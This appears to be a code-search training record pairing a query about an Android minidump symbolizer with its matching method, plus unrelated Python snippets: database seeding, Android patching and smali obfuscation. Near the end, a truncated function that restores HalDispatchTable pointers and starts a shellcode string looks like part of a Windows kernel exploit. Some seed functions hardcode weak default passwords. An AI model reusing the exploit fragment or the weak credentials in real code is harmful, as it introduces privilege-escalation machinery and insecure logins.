''')", "def initdb():\n db = getdb()\n\n with open(os.path.join(config.BASE_DIRECTORY, 'schema.sql')) as f:\n db.executescript(f.read())", "def add_user(db_file, user_uri, user_name):\n\n conn = create_db_connection(db_file)\n cur = conn.cursor()\n\n # Add new user to user table\n new_user = (user_uri, user_name)\n sql_add_new_user = \"\"\" INSERT INTO users(user_uri, user_name)\n VALUES(?,?) \"\"\"\n\n try:\n cur.execute(sql_add_new_user, new_user)\n except Exception as e:\n print(\"Failed adding entry to table users: \" + str(e))\n \n\n conn.commit()\n cur.close()", "def create_users_table():\n try:\n print(\"Creating 'users' table..\")\n db.execute(\"CREATE TABLE users (\\\n id SERIAL PRIMARY KEY, \\\n username VARCHAR NOT NULL, \\\n password VARCHAR NOT NULL\\\n )\")\n print(\"Table 'users' created\")\n except exc.ProgrammingError as err:\n print(\"Table 'users' already exists\")\n db.commit()", "def migrate_db():\n Base.metadata.create_all(ENGINE)", "def load_users():\n\n print \"Users\"\n\n User.query.delete()\n\n for row in open(\"seed_data/u.user\"):\n row = row.rstrip()\n ID, password, name, first_entry_at = row.split(\"|\")\n first_entry_at = datetime.strptime(first_entry_at, \"%m-%d-%y\")\n\n user = User(ID=ID, password=password, name=name, first_entry_at=first_entry_at)\n\n db.session.add(user)\n\n db.session.commit()", "def addUsertoDatabase(self):\r\n self.c.execute(\"\"\"INSERT INTO student_information VALUES (?,?,?)\"\"\",(self.name,self.password,self.budget,))\r\n self.con.commit()\r\n print(\"Added to Database Student..\")", "def setup_tables(self):\n try:\n self.cursor.execute('CREATE SCHEMA sandbox')\n self.cursor.execute(\"DROP TABLE sandbox.dvds_rdbhdb_super;\")\n except (db.ProgrammingError, db.OperationalError), e:\n # sandbox may not exist\n pass #raise\n\n try:\n self.cursor.execute(\n \"\"\"CREATE TABLE sandbox.dvds_rdbhdb_super(\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n rating float,\n UNIQUE(name)\n );\n \"\"\" )\n except db.ProgrammingError, e:\n if e[0] != '42P07':\n raise", "def add_to_online_db(table, user_list):\n cur_time = datetime.datetime.now()\n client, db = open_db_connection()\n db[table].remove()\n for user in user_list:\n net_id = user.replace(\"\\r\\n\", \"\").encode(\"utf-8\")\n db[table].insert({\"net_id\": net_id, \"status\": \"offline\", \"_id\": net_id, \"total_time\":random.random()*200, \"last_login\":cur_time})\n close_db_connection(client)", "def install(self):\n conn = sqlite3.connect(self.__DB)\n cursor = conn.cursor()\n\n # creating tables...\n\n cursor.execute('''\n CREATE TABLE users (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n agency TEXT NOT NULL,\n account TEXT NOT NULL,\n password TEXT NOT NULL,\n balance REAL NOT NULL\n );\n ''')\n\n cursor.execute('''\n CREATE TABLE history (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n register TEXT NOT NULL,\n owner INTEGER NOT NULL\n );\n ''')\n\n # inserting a few users by default (there isn't 'sign up' requirement for this app)...\n\n hasher = User('', '', '')\n users_data = [\n ('A1', '00000-0', hasher.str_to_hash('pass0'), 1500),\n ('A1', '11111-1', hasher.str_to_hash('pass1'), 400),\n ('A2', '22222-2', hasher.str_to_hash('pass2'), 260),\n ('A3', '33333-3', hasher.str_to_hash('pass3'), 380),\n ('A2', '44444-4', hasher.str_to_hash('pass4'), 240),\n ]\n\n cursor.executemany('''\n INSERT INTO users (agency, account, password, balance)\n VALUES (?, ?, ?, ?);\n ''', users_data)\n\n conn.commit()\n conn.close()\n\n self.load_users()", "def migrate(cls):\n database.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS meetups(\n id serial PRIMARY KEY,\n topic varchar,\n happening_date varchar,\n tags varchar,\n location varchar,\n images varchar,\n body varchar\n )\"\"\")\n database.connection.commit()", "def tear_down():\n db.flush()\n for table in metadata.tables.values():\n db.execute(table.delete())", "def create_tables(self):\n for query in table_create_sql:\n self.cursor.execute(query)\n\n self.commit()", "def initdb():\n db.drop_all()\n db.configure_mappers()\n db.create_all()\n db.session.commit()", "def initialize():\n db.connect()\n db.create_tables([Expense], safe=True)", "def refresh_tables(db):\r\n try:\r\n c = db.cursor()\r\n c.execute(\"DROP TABLE waiting\")\r\n c.execute(\"DROP TABLE help\")\r\n c.execute(\"DROP TABLE helped\")\r\n create_tables()\r\n except Error as e:\r\n print(e)", "def setup_user_db():\n with create_app().app_context():\n sess = GlobalDB.db().session\n insert_codes(sess)\n sess.commit()", "def create_database_tables():\n with APP.app_context():\n DB.create_all()", "def _load_db(self):\n for type_ in self._types:\n try:\n type_.table(self._metadata)\n except InvalidRequestError:\n pass\n # Reflect metadata so auto-mapping works\n self._metadata.reflect(self._engine)\n # Make sure the tables exist\n self._metadata.create_all()", "def populate_db():\n stdout.write('Emptying the tables...\\n')\n empty_tables()\n stdout.write('Populating Language records...\\n')\n populate_language()\n stdout.write('Populating Lemma, Wordform, and Definition records...\\n')\n populate_lexical()\n stdout.write('Populating ProperName records...\\n')\n populate_proper_names()", "def update(self):\n current = LazyRegister(self.db)\n current.render()\n cur = self.db.cursor()\n for table in self.tables:\n if table in current.tables:\n additions, removals = current.tables[table].migrate(self.tables[table])\n for addition in additions:\n cur.execute(\"\"\"ALTER TABLE %s ADD COLUMN %s\"\"\" % (\n table, addition[1].get_sql()\n ))\n print('Added column: ', addition[0])\n for removal in removals:\n #cur.execute(\"\"\"ALTER TABLE %s DROP COLUMN %s\"\"\" % (\n # table, removal[0]\n #))\n #print('Removed column: ', removal[0])\n print('Did not removed column: ', removal[0])\n else:\n schema = self.tables[table].get_create_table_sql()\n cur.execute(schema)\n print('Added table %s' % table)", "def createDB(self):\n\n\n mycursor.execute(\"DROP TABLE tweet\")\n mycursor.execute(\"DROP TABLE follower\")\n\n mycursor.commit()\n\n createFollowerTable = \"CREATE TABLE follower (\" \\\n \"screen_name VARCHAR(255),\" \\\n \"name varchar(255),\" \\\n \"PRIMARY KEY(screen_name)\" \\\n \")\"\n\n #createTweetTable = \"CREATE TABLE tweet (\" \\\n # \"idT VARCHAR(255),\" \\\n # \"idF VARCHAR(255),\" \\\n # \"type VARCHAR(255),\" \\\n # \"content VARCHAR(140),\" \\\n # \"weight INTEGER(10),\" \\\n # \"PRIMARY KEY(idT),\" \\\n # \"FOREIGN KEY (idF) REFERENCES follower(idF)\" \\\n # \")\"\n\n mycursor.execute(createFollowerTable)\n #mycursor.execute(createTweetTable)\n\n mydb.commit()", "def recreate_db():\n\n print(\"will reinit db - FAKE\")\n db.create_tables([Message, Instance])\n\n # no need to prepare a sample record.\n # use http to create init request instead.\n #inject_record()", "def _add_to_master():\n global _TEMP_NAME\n global _NAME\n\n try:\n database.add_to_master(_TEMP_NAME, _NAME)\n except:\n raise ValueError(f'ERROR: Cannot add {_TEMP_NAME} table to {_NAME} table in the database!')", "def migrate(self):\n\tpass", "def create_tables() -> None:\n print(\"Creating database tables using SQLAlchemy ORM\")\n Base.metadata.create_all(engine)\n print(\"Done creating tables\")", "def register_db():\n models = (Storage,\n AccessInfo\n )\n engine = create_engine(CONF.database.connection, echo=False)\n for model in models:\n model.metadata.create_all(engine)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def create_empty_db():\r\n drop_db()\r\n database.create_tables([Customer])\r\n database.close()", "def drop_tables(self):\n with sql.connect('./{}.db'.format(self.name)) as conn:\n conn.execute(\"DROP TABLE tweets\")\n conn.execute(\"DROP TABLE tweet_peaks\")", "def _createUserTable(self):\n\n\t\tcommand = \"\"\"CREATE TABLE users (chat_id INTEGER PRIMARY KEY,\n\t\t\tlang TEXT,\n\t\t\tadmin INTEGER,\n\t\t\tcur_course INTEGER,\n\t\t\tanswer_state INTEGER\n\t\t\t);\n\"\"\"\n\n\t\tself._run_command(command)", "def reset_dbs():\n db.answering_users.remove({})\n db.answered_users.remove({})", "def __new_tables_statement(self):\n new_tables = self.__new_tables()\n for table in new_tables:\n with open('./update/create_tables.sql', 'a') as f:\n create_statement = self.source.query_create_table_statement(table.name)\n f.write(create_statement)\n f.write('\\n')", "def setup_mysql():\n with lcd(env.projectroot):\n put(\"manage/sysconf/%(target)s/mysql/setup-mysql.sql\" % env, \"/tmp\")\n #sudo(\"mysql -u root -p < /tmp/setup-mysql.sql\")\n sudo(\"mysql -u root < /tmp/setup-mysql.sql\")", "def add_users():\n try:\n User.objects.get(username='admin').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_superuser(username='admin', password='admin', email='')\n print('> Superuser was created')\n\n try:\n User.objects.get(username='user1').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_user(username='user1', password='user1', email='')\n print('> User (user1) was created')", "def create_tables():\n print('Creating tables.')\n # import the models used to describe the tables we're creating (using the\n # ORM). Link: http://flask-sqlalchemy.pocoo.org/2.3/models/\n import src.models.models as m\n Base.metadata.create_all(bind=engine)\n session.commit()\n\n import csv\n import bcrypt\n\n # let's add the admin user\n role = 1\n pw_hashed = bcrypt.hashpw('1234'.encode('utf-8'), bcrypt.gensalt(12))\n u = m.User(name=\"Admin\", email=\"admin@email.com\", pw=pw_hashed.decode('ascii'), role=role)\n session.add(u)\n\n # let's add the normal user\n role = 0\n pw_hashed = bcrypt.hashpw('5678'.encode('utf-8'), bcrypt.gensalt(12))\n u = m.User(name=\"User\", email=\"user@email.com\", pw=pw_hashed.decode('ascii'), role=role)\n session.add(u)\n\n # let's add three congregations\n n_cong = m.Congregation(name=\"North\")\n b_cong = m.Congregation(name=\"Belconnen\")\n c_cong = m.Congregation(name=\"City\")\n session.add(n_cong)\n session.add(b_cong)\n session.add(c_cong)\n \n # let's add all the books of the bible\n # thanks to jpoehls @ gh.com/jpoehls/bible-metadata for the bible_meta file!\n r = 0\n with open('bible_meta.csv', newline='') as file:\n reader = csv.reader(file)\n for row in reader:\n if r>0:\n b = m.Books_Bible(name=row[1], nickname=row[2], volume=row[4])\n session.add(b)\n else:\n r += 1 # first line contains junk\n\n session.commit()", "def seed_db():\n import cerbereapp.models as models\n con = engine.connect()\n con.execute(models.account_type.insert(), [\n {'Guest'},\n {'Premium'},\n {'Free'}])\n db_session.execute(models.profiles.insert(), [\n {'user_id': 1, 'profile_name' : '1recon'},\n {'user_id': 1, 'profile_name' : '1medic'},\n {'user_id': 2, 'profile_name' : '2recon'},\n {'user_id': 2, 'profile_name' : '2medic'}])\n db_session.commit()", "def add_user(username, password, fullname, joined, groups, folders, active, confirmdelete, viewmode, theme, table, db_file):\n \n try:\n conn, c = connect_to_db(db_file)\n sqlcmd = \"\"\"INSERT INTO {t} (id, username, password,\n fullname, joined, groups, folders, active, confirmdelete, viewmode, theme)\n VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\"\"\".format(t=safe(table))\n c.execute(sqlcmd, (username, password, fullname, joined, groups, folders, active, confirmdelete, viewmode, theme,))\n conn.commit()\n conn.close()\n except Exception as e:\n print(\"add_user(): Error when trying to add user \" + username + \\\n \" in table \" + table + \" in \" + db_file)\n print(e)\n return False\n else:\n return True", "def clean_up():\n drop_all_tables()\n create_all()", "def add_user(self):\n query = \"INSERT INTO users (first_name, last_name, email, password) VALUES (%s, %s, %s, %s)\"\n self.cursor.execute(query,(\n self.first_name, \n self.last_name, \n self.email, \n self.password))", "def init_db_command():\n upgrade()\n from .model import User, db\n u = User.query.filter_by(email='demos@gammalab.us').first()\n if not u:\n u = User(email='demos@gammalab.us', password='test')\n db.session.add(u)\n db.session.commit()\n click.echo('Add new user(email: demos@gammalab.us password: test)')\n click.echo('Initialized the database.')", "def initDb():\n createDb()\n admin = User(\n name=\"faby\",\n lastname=\"star\",\n username=\"faby\",\n email=\"star._faby@hotmail.com\",\n isAdmin=True,\n cellphone=\"0983856136\",\n )\n admin.onSetPassord(\"faby123\")\n db.session.add(admin)\n db.session.commit()", "def setup_db(filepath, tables=(), reset=False):\n \n if os.path.exists(filepath) and not reset:\n return\n \n if os.path.exists(filepath) and reset:\n os.remove(filepath)\n \n # create table with appropriate columns\n with get_conn(filepath) as conn:\n for tab in tables:\n make_table(conn, tab.name,\n tab.text_fields, tab.real_fields)", "def seed_db():\n db.session.add(User(username='Joe', email='shmoe@test.com'))\n db.session.add(User(username='Joe2', email='joe@test.com'))\n db.session.commit()", "def init_db():\n db.drop_all()\n db.configure_mappers()\n db.create_all()\n db.session.commit()", "def set_tables(self):\n with sql.connect('./{}.db'.format(self.name)) as conn:\n conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tweets(\n id INTEGER PRIMARY KEY,\n tweet_id INTEGER,\n insert_date TEXT,\n created_at TEXT,\n hashtag TEXT)\n \"\"\")\n\n conn.execute(\"\"\"CREATE TABLE tweet_peaks(\n peak_datetime TEXT NOT NULL,\n hashtag TEXT NOT NULL,\n time_frame TEXT,\n mean REAL,\n std REAL,\n sensibility REAL,\n freq_limit REAL,\n qt_tweets INTEGER,\n id TEXT PRIMARY KEY,\n probability REAL);\n \"\"\")", "def add_to_database(self, df):\n \n from sqlalchemy import create_engine\n \n engine = create_engine(\"mysql://dublinbus:somepaawsord/researchpracticum\")\n con = engine.connect()\n df.to_sql(con=con, name='TimeTables', if_exists='append')\n con.close()", "def create_tables(cursor):\n cursor.execute(\"\"\"\n CREATE TABLE users(\n userid INTEGER PRIMARY KEY,\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n email TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE groups(\n groupid INTEGER PRIMARY KEY,\n name TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE usergroups(\n userid INTEGER,\n groupid INTEGER,\n PRIMARY KEY (userid, groupid)\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n FOREIGN KEY (groupid) REFERENCES groups (groupid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE settings(\n key TEXT PRIMARY KEY,\n value\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE sessions(\n userid INTEGER PRIMARY KEY,\n key TEXT NOT NULL,\n started TEXT DEFAULT (datetime('now')),\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"CREATE UNIQUE INDEX idx_groups_name ON groups (name)\")\n cursor.execute(\n \"CREATE UNIQUE INDEX idx_users_username ON users (username)\"\n )", "def create_tables(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE birthday (\n chat_id INTEGER,\n user_id INTEGER,\n date DATE,\n notified_on DATE,\n FOREIGN KEY(chat_id) REFERENCES chats(id),\n FOREIGN KEY(user_id) REFERENCES users(id)\n );\n \"\"\")\n self.save()", "def create_table():\n db, c = config.start_db()\n try:\n c.execute('''CREATE TABLE users (\n username TEXT PRIMARY KEY,\n pass_hash BLOB NOT NULL,\n salt BLOB NOT NULL,\n karma INT NOT NULL\n )''')\n except sqlite3.OperationalError: # Table already exists\n pass\n config.end_db(db)", "def testAddAndDatabaseUpdates(self):\n self.users.TESTAPI_resetFixture()\n self.assertEqual(len(models.UsersModel.objects.all()), 0)\n self.users.add(\"count\", \"necula\")\n self.assertEqual(len(models.UsersModel.objects.all()), 1)\n self.users.add(\"george\", \"necula\")\n self.assertEqual(len(models.UsersModel.objects.all()), 2)", "def mysql_import():\n # first make another copy of the db\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db_temp.sql\")\n # then import from the backup\n run(\"mysql -u database_user -p -D database_name < ~/tmp/exported_db.sql\")", "def create_tables(self):\n users_tb = \"\"\"CREATE TABLE IF NOT EXISTS Users(\n user_id serial PRIMARY KEY,\n email varchar(30) NOT NULL,\n username varchar(15) NOT NULL,\n password varchar(250) NOT NULL,\n role varchar(10) DEFAULT 'User'\n );\"\"\"\n\n meals_tb = \"\"\"CREATE TABLE IF NOT EXISTS Meals(\n meal_id serial PRIMARY KEY,\n meal_name varchar(25) NOT NULL,\n image varchar(150) NOT NULL,\n description varchar(250) NOT NULL,\n unit_price decimal(5,2) NOT NULL\n );\"\"\"\n\n orders_tb = \"\"\"CREATE TABLE IF NOT EXISTS Orders(\n order_id serial PRIMARY KEY,\n user_id integer NOT NULL,\n meal_id integer NOT NULL,\n address varchar(50),\n quantity int NOT NULL,\n order_date timestamp NOT NULL,\n status varchar(15),\n FOREIGN KEY (user_id) REFERENCES users(user_id)\n ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (meal_id) REFERENCES meals(meal_id)\n ON DELETE CASCADE ON UPDATE CASCADE\n );\"\"\"\n return [users_tb, meals_tb, orders_tb]", "def install(drop_all=False):\n\n print \"Connecting to database...\"\n engine = create_engine(config.DATABASE_URI)\n Base.metadata.bind = engine\n\n if drop_all:\n print \"Dropping old tables...\"\n Base.metadata.drop_all()\n \n print \"Installing new schema...\"\n Base.metadata.create_all(engine)", "def drop_tables() -> None:\n print(\"Dropping database tables using SQLAlchemy ORM\")\n Base.metadata.drop_all(engine)\n print(\"Done dropping tables\")", "def init_db(db):\n\n # will create database and tables if not exist\n db.create_all()\n\n # will append a default user if none exist\n if models.User.query.count() == 0:\n default_user = models.User('admin', 'password', 'John', 'Smith')\n db.session.add(default_user)\n db.session.commit()", "def createdb():\n db.create_all()", "def initialize_tables(database_connection_object, logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)" ]
[ "0.6519952", "0.62828916", "0.61585516", "0.6156607", "0.61473525", "0.6075949", "0.5991981", "0.5991254", "0.5913686", "0.5912704", "0.5908939", "0.5908939", "0.5899569", "0.5880359", "0.5877914", "0.5871357", "0.5836821", "0.58103013", "0.57808405", "0.5778543", "0.57273936", "0.5695358", "0.569088", "0.56801015", "0.56705755", "0.5667713", "0.5655319", "0.5647554", "0.56450355", "0.56349105", "0.56253856", "0.56025875", "0.55956787", "0.5590576", "0.55848175", "0.557878", "0.5576953", "0.55726546", "0.55693287", "0.5555832", "0.55524576", "0.55519044", "0.55496305", "0.55456656", "0.55332327", "0.55128896", "0.5507435", "0.54986125", "0.5498003", "0.54892105", "0.54861796", "0.54848534", "0.54720074", "0.54691297", "0.5457565", "0.5440201", "0.5434306", "0.54309547", "0.5424828", "0.5423377", "0.5423041", "0.54182136", "0.5417507", "0.5417167", "0.5413544", "0.540867", "0.5408061", "0.54058313", "0.5400136", "0.5400136", "0.539885", "0.5398538", "0.5396036", "0.5385953", "0.53732115", "0.5372415", "0.5371351", "0.53707945", "0.5369817", "0.535458", "0.5352514", "0.5350767", "0.5338126", "0.5337184", "0.53262794", "0.532531", "0.5324137", "0.53180826", "0.5315821", "0.5309099", "0.5306206", "0.5300958", "0.5295361", "0.52843463", "0.52820736", "0.5280818", "0.52770233", "0.52714473", "0.5270176", "0.52678424" ]
0.6568307
0
Class for handling all minidump symbolizing code on Android.
def __init__(self, dump_finder, build_dir, symbols_dir=None): # Map from minidump path (string) to minidump_dump output (string). self._minidump_dump_output = {} # Map from minidump path (string) to the directory that should be used when # looking for symbol binaries (string). self._minidump_symbol_binaries_directories = {} # We use the OS/arch of the host, not the device. super(AndroidMinidumpSymbolizer, self).__init__( platform.system().lower(), platform.machine(), dump_finder, build_dir, symbols_dir=symbols_dir)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def obfuscate():\r\n smali_file_list = u.load_smali_file() # Load smali files\r\n set()\r\n change_all_direct_method(\r\n set(\r\n find_all_direct_method(\r\n list(u.get_android_method_names()) + list(set(find_all_native_method(smali_file_list))),\r\n smali_file_list\r\n )\r\n ),\r\n smali_file_list,\r\n set(\r\n find_all_landroid_ljava_over(\r\n smali_file_list\r\n )\r\n )\r\n )", "def android_patch() -> None:\n fname = 'src/cpython/Modules/Setup.dist'\n txt = efrotools.readfile(fname)\n\n # Need to switch some flags on this one.\n txt = efrotools.replace_one(txt, '#zlib zlibmodule.c',\n 'zlib zlibmodule.c -lz\\n#zlib zlibmodule.c')\n # Just turn all these on.\n for enable in [\n '#array arraymodule.c', '#cmath cmathmodule.c _math.c',\n '#math mathmodule.c', '#_contextvars _contextvarsmodule.c',\n '#_struct _struct.c', '#_weakref _weakref.c',\n '#_testcapi _testcapimodule.c', '#_random _randommodule.c',\n '#_elementtree -I', '#_pickle _pickle.c',\n '#_datetime _datetimemodule.c', '#_bisect _bisectmodule.c',\n '#_heapq _heapqmodule.c', '#_asyncio _asynciomodule.c',\n '#unicodedata unicodedata.c', '#fcntl fcntlmodule.c',\n '#select selectmodule.c', '#_csv _csv.c',\n '#_socket socketmodule.c', '#_blake2 _blake2/blake2module.c',\n '#binascii binascii.c', '#_posixsubprocess _posixsubprocess.c',\n '#_sha3 _sha3/sha3module.c'\n ]:\n txt = efrotools.replace_one(txt, enable, enable[1:])\n if ENABLE_OPENSSL:\n txt = efrotools.replace_one(txt, '#_ssl _ssl.c \\\\',\n '_ssl _ssl.c -DUSE_SSL -lssl -lcrypto')\n else:\n # Note that the _md5 and _sha modules are normally only built if the\n # system does not have the OpenSSL libs containing an optimized\n # version.\n for enable in [\n '#_md5 md5module.c', '#_sha1 sha1module.c',\n '#_sha256 sha256module.c', '#_sha512 sha512module.c'\n ]:\n txt = efrotools.replace_one(txt, enable, enable[1:])\n\n # Turn this off (its just an example module).\n txt = efrotools.replace_one(txt, 'xxsubtype xxsubtype.c',\n '#xxsubtype xxsubtype.c')\n\n # For whatever reason this stuff isn't in there at all; add it.\n txt += '\\n_json _json.c\\n'\n\n txt += '\\n_lzma _lzmamodule.c -llzma\\n'\n\n txt += ('\\n_sqlite3 -I$(srcdir)/Modules/_sqlite'\n ' -DMODULE_NAME=\\'\\\\\"sqlite3\\\\\"\\' -DSQLITE_OMIT_LOAD_EXTENSION'\n ' -lsqlite3 \\\\\\n'\n ' _sqlite/cache.c \\\\\\n'\n ' _sqlite/connection.c \\\\\\n'\n ' _sqlite/cursor.c \\\\\\n'\n ' _sqlite/microprotocols.c \\\\\\n'\n ' _sqlite/module.c \\\\\\n'\n ' _sqlite/prepare_protocol.c \\\\\\n'\n ' _sqlite/row.c \\\\\\n'\n ' _sqlite/statement.c \\\\\\n'\n ' _sqlite/util.c\\n')\n\n if ENABLE_OPENSSL:\n txt += '\\n\\n_hashlib _hashopenssl.c -DUSE_SSL -lssl -lcrypto\\n'\n\n txt += '\\n\\n*disabled*\\n_ctypes _crypt grp'\n\n efrotools.writefile(fname, txt)\n\n # Ok, this is weird.\n # When applying the module Setup, python looks for any line containing *=*\n # and interprets the whole thing a a global define?...\n # This breaks things for our static sqlite compile above.\n # The check used to look for [A-Z]*=* which didn't break, so let' just\n # change it back to that for now.\n fname = 'src/cpython/Modules/makesetup'\n txt = efrotools.readfile(fname)\n txt = efrotools.replace_one(\n txt, '\t\t*=*)\tDEFS=\"$line$NL$DEFS\"; continue;;',\n '\t\t[A-Z]*=*)\tDEFS=\"$line$NL$DEFS\"; continue;;')\n efrotools.writefile(fname, txt)\n\n print('APPLIED EFROTOOLS ANDROID BUILD PATCHES.')", "def _binaries_to_symbolize(self):\n raise NotImplementedError()", "def obfuscate():\n smali_file_list = u.load_smali_file() # Load smali files\n change_all_field(set(find_all_field(smali_file_list)), smali_file_list, set(find_all_landroid_ljava_over(smali_file_list)))", "def test_llvm_strip(self):\n self.assertEqual(\n self.ndk.llvm_strip,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-strip\",\n )", "def get_apk(self):", "def test_llvm_objdump(self):\n self.assertEqual(\n self.ndk.llvm_objdump,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-objdump\",\n )", "def _boilerplate_to_python(indent):\n indent_str = \" \" * indent\n boilerplate = indent_str + \"import core.vba_library\\n\"\n boilerplate = indent_str + \"import core.vba_context\\n\"\n boilerplate += indent_str + \"from core.utils import safe_print\\n\"\n boilerplate += indent_str + \"from core.utils import safe_str_convert\\n\"\n boilerplate += indent_str + \"from core.utils import plus\\n\"\n boilerplate += indent_str + \"from core.utils import eq\\n\"\n boilerplate += indent_str + \"from core.utils import neq\\n\"\n boilerplate += indent_str + \"from core.utils import lt\\n\"\n boilerplate += indent_str + \"from core.utils import lte\\n\"\n boilerplate += indent_str + \"from core.utils import gt\\n\"\n boilerplate += indent_str + \"from core.utils import gte\\n\"\n boilerplate += indent_str + \"import core.utils\\n\"\n boilerplate += indent_str + \"from core.python_jit import update_array\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_num\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_int\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_str\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_int_list\\n\\n\"\n boilerplate += indent_str + \"try:\\n\"\n boilerplate += indent_str + \" \" * 4 + \"vm_context\\n\"\n boilerplate += indent_str + \"except (NameError, UnboundLocalError):\\n\"\n boilerplate += indent_str + \" \" * 4 + \"vm_context = context\\n\"\n return boilerplate", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def __init__(self, static_lib):\n # TODO: Support dump for reading symbols from static libraries\n assert not static_lib and \"static libs not yet supported with dump\"\n self.tool = self.find_tool()\n if self.tool is None:\n print(\"ERROR: Could not find dump\")\n sys.exit(1)\n self.flags = ['-n', '-v']\n object_mode = environ.get('OBJECT_MODE')\n if object_mode == '32':\n self.flags += ['-X32']\n elif object_mode == '64':\n self.flags += ['-X64']\n else:\n self.flags += ['-X32_64']", "def test_py2hex_minify_arg():\n with mock.patch('uflash.flash') as mock_flash:\n uflash.py2hex(argv=['tests/example.py', '-m'])\n mock_flash.assert_called_once_with(path_to_python='tests/example.py',\n path_to_runtime=None,\n paths_to_microbits=['tests'],\n minify=True,\n keepname=True)", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def applyDemapping(self):\n pass", "def _clean_amm_swaps(cursor: 'DBCursor') -> None:\n log.debug('Enter _clean_amm_swaps')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"uniswap_trades%\";')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"sushiswap_trades%\";')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"balancer_trades%\";')\n cursor.execute('DROP VIEW IF EXISTS combined_trades_view;')\n cursor.execute('DROP TABLE IF EXISTS amm_swaps;')\n log.debug('Exit _clean_amm_swaps')", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation):\n\tif HaliQuerySystemInformation == 0x0 or HalpSetSystemInformation == 0x0:\n\t\treturn \"\"\n\telse:\n\t\tshellcode = 